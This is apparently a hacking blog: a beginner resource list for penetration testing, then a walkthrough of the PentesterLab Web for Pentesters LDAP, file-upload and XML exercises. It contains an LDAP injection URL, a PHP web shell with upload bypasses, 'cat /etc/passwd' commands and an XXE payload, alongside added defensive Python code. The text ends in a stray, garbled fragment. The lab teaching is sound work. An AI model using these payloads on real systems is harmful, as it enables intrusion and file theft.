Resources for beginners

So you’re looking to get into the wonderful world of penetration testing, but have no clue where to start? Don’t worry, I was just like you (hence why I started this blog). In this post I’ll provide some resources to help get you started.

Programming Languages

To be able to exploit a system, you will need to know how to program and (at least) know the basics of the language used by the system you are exploiting. A simple scripting language that I recommend is Python. It’s easy to learn and allows you to build quick scripts to help exploit a system. Also, since you’ll most likely be starting off by exploiting web pages and web applications, you should learn HTML, JavaScript and PHP. A lot of web pages and applications are built using these languages, along with CSS. Codecademy is a good site to help you learn these languages; they offer great tutorials in all of these languages and more.

Basic exploitation walkthrough.

Now that you have learnt how web apps are put together, how do you start exploiting a site or a company’s network? Penetration Testing: A Hands-On Introduction to Hacking is a great resource for beginners. It covers the basics of the penetration testing process and some of the tools used in each phase. It definitely helped me get started and wrap my head around some of the tools used.

Another great resource to help you get started with basic web application testing is PentesterLab; in particular, the Web for Pentesters series gives you a solid understanding of the types of exploits that are found in web applications. P.S. I have a basic walkthrough of the first Web for Pentesters VM on my blog.

How do I sharpen my skills?

Now that you know the basics, you need to practice your skills, but how? PentesterLab has some more advanced tutorials for you to try. Another similar vulnerable VM is WebGoat; it has a similar style to the PentesterLab VM, where they walk through each of the exploits and explain why the exploit exists.
What’s that, you want something a little more challenging? Well then VulnHub has you covered. They offer community-made virtual machines, and the solutions offered are written by people who have completed the challenge. They are challenging, but not impossible, and if you get stuck you can always look at the solutions and see how that person solved it.

Write your own exploits.

A great book for learning how to write your own exploits, and one that I am currently working through, is Violent Python. This book teaches you how to write your own exploits, botnets and viruses in Python. This is of course a little advanced and could be something to build up to.

Some advice.

Lastly, I’ll leave you with some advice that I wish I had known earlier. PRACTICE, PRACTICE, PRACTICE. Just practice and really spend the time understanding how an exploit happens and why. Also build applications yourself, exploit them and patch them. This will help you understand what to look for when trying to find exploits in a system or web application.
If you have any questions or suggestions, drop me a line in the comment section below. Until next time, keep on hacking.

Web for Pentesters 1: LDAP, file upload and XML attacks.

In this post I’ll be walking through the Web for Pentesters 1 LDAP, file upload and XML attacks. These are the last of the exercises for the virtual machine and will conclude this series.

First off, what is LDAP? LDAP (Lightweight Directory Access Protocol) is a protocol for accessing and maintaining a directory over the internet. So it basically allows a user to access a directory remotely and modify it as if they were physically on that machine.

LDAP Answers:
Example 1:
For the first example, we just remove everything in the URL from the ? onwards (the whole query string), and this should result in you being authenticated.

Example 2:
For example 2 you will need to close the filter early and comment out the rest of the query, so that the server accepts any password you pass it.

The URL you end up with should look something like this:
example2.php?name=hacker)(cn=*))&password=fake.

The null byte (URL-encoded as %00) placed after the injected filter truncates the query, so any code after it is ignored.
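To see why this works and how it is fixed, here is an added example (my code, not code from the PentesterLab VM or this exercise) that builds the login filter both the vulnerable way and with RFC 4515 escaping. The attribute names and the (&(cn=...)(userPassword=...)) filter shape are assumptions about what the exercise's page does.

```python
# Added example, not the exercise's own code. The filter shape and the
# attribute names cn / userPassword are assumptions for the demo.

# RFC 4515 section 3: characters with special meaning inside a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_ldap_value(value: str) -> str:
    """Escape a user-supplied value so it can only ever match literally."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(name: str, password: str) -> str:
    """Raw concatenation: the pattern the exercise exploits."""
    return f"(&(cn={name})(userPassword={password}))"


def build_login_filter(name: str, password: str) -> str:
    """Hardened: injected parentheses, wildcards and NULs are neutralised."""
    return (f"(&(cn={escape_ldap_value(name)})"
            f"(userPassword={escape_ldap_value(password)}))")


def effective_filter(filt: str) -> str:
    """Model a C-string server: everything after the first NUL is dropped,
    which is why the trailing null byte 'comments out' the password test."""
    return filt.split("\x00", 1)[0]


def is_balanced(filt: str) -> bool:
    """Parentheses balance check. Note the injected filter still passes it,
    so structure checks alone are no defence; escaping is."""
    depth = 0
    for ch in filt:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0


if __name__ == "__main__":
    # Constructed input: the post's example 2 name, with the trailing NUL.
    name, password = "hacker)(cn=*))\x00", "fake"
    print(effective_filter(build_login_filter_unsafe(name, password)))
    print(build_login_filter(name, password))
```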

File Upload:

The code we will use in the file that will be uploaded is the following:
<?php
    // runs whatever is passed in the cmd query parameter
    system($_GET["cmd"]);
?>

Copy that into a .php file.
Example 1:
Upload the PHP file with the code above; once uploaded, follow the link provided by the VM.
Once on that page, you should get an error saying the system cannot execute a blank command.
All you now have to do is append ?cmd=cat /etc/passwd to output the passwd file contents on the page.
Example 2:
For this example you will need to create a new file with the code above and the extension .php.blah. You can swap blah for something else; just make sure the server has no handler for that extension.
Upload the file, click the link and you should get the same error you got in example 1. Now all you have to do is append ?cmd=cat /etc/passwd to the URL and you should get the passwd file displayed.
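As an added example (my code, not part of the exercise or this post's original code), here is the kind of server-side check that would have stopped both uploads above: one extension only, an allow-list, and the content checked against the claimed extension. The allowed types, magic bytes and size limit are my assumptions.

```python
# Added example, not the VM's code. ALLOWED, MAX_BYTES and the stem pattern
# are assumed values for the demo.
import re
import secrets

# Allow-list of extensions with the magic bytes their content must start with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}
MAX_BYTES = 2 * 1024 * 1024          # assumed limit
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason) for one upload.

    Closes the two holes from the exercise: a bare .php file (not on the
    allow-list) and a double extension like shell.php.blah (more than one
    dot). Also refuses NULs and path separators in the name, and content
    whose first bytes do not match the claimed extension."""
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False, "illegal character in filename"
    parts = filename.split(".")
    if len(parts) != 2:
        # Apache-style servers can apply a handler to every extension in
        # a.php.blah, so exactly one extension is required.
        return False, "exactly one extension required"
    stem, ext = parts[0], parts[1].lower()
    if not _SAFE_STEM.match(stem):
        return False, "bad filename"
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if len(content) > MAX_BYTES:
        return False, "file too large"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Never reuse the client's name on disk: random stem, validated ext."""
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs mirroring the walkthrough's two uploads and a real image.
    shell = b"<?php system($_GET['cmd']); ?>"
    for name, data in [("shell.php", shell), ("shell.php.blah", shell),
                       ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)]:
        print(name, validate_upload(name, data))
```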
XML attack:
Example 1:
Here all you have to do is type the command provided by PentesterLab into the URL with a null byte (%00) at the end, and the exploit should work.
<%21DOCTYPE%20test%20%5b<%21ENTITY%20hacker%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%5d><test>%26hacker%3b<%2ftest>%0a%0a
Example 2:
If you follow what is on PentesterLab, the exploit should work and give you the password pentesterlab.
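For the defensive side, here is an added example (my code, not PentesterLab's) of an XML reader that rejects the entity declaration the payload above relies on before anything is expanded. It uses only the standard library's expat binding; the <test> element shape is taken from the exercise.

```python
# Added example, not the exercise's code. Uses the stdlib expat binding
# directly so every DTD entity declaration can be refused up front.
import xml.parsers.expat as expat


class ForbiddenXML(ValueError):
    """Raised when a document declares entities or asks for external data."""


def parse_text_elements(data: bytes) -> dict:
    """Parse a small XML document into {element name: text}.

    Any entity declaration (internal or SYSTEM) and any external entity
    reference raises ForbiddenXML, so file:///etc/passwd is never read."""
    parser = expat.ParserCreate()
    # Never fetch external parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def entity_decl(name, is_pe, value, base, system_id, public_id, notation):
        raise ForbiddenXML(f"entity declaration {name!r} rejected")

    def external_ref(context, base, system_id, public_id):
        raise ForbiddenXML(f"external entity {system_id!r} rejected")

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref

    result, stack = {}, []
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()

    def chars(text):
        if stack:
            result[stack[-1]] = result.get(stack[-1], "") + text

    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return result


def is_rejected(data: bytes) -> bool:
    """True if the reader refused the document."""
    try:
        parse_text_elements(data)
    except ForbiddenXML:
        return True
    return False


# Constructed inputs: the exercise's payload (URL-decoded) and a benign document.
XXE_PAYLOAD = (b'<!DOCTYPE test [<!ENTITY hacker SYSTEM "file:///etc/passwd">]>'
               b'<test>&hacker;</test>')
BENIGN = b'<test>hello</test>'
```')
</test>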